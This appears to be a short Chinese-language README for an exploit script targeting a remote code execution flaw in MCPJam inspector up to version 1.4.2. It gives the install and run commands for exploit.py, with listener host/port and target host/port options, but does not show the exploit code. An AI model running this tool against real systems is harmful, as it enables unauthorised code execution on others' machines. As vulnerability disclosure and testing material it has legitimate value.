MCPJam inspector 是一个面向 MCP 服务器的本地优先开发平台。版本 <=1.4.2 存在远程代码执行漏洞,攻击者可发送特制的 HTTP 请求触发 MCP 服务器的安装,从而导致 RCE。有关漏洞详情,请参阅参考资料。
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help 显示帮助信息并退出
--lhost LHOST 本地主机 IP
--lport LPORT 本地主机端口
--rhost RHOST 远程 IP
--rport RPORT 远程端口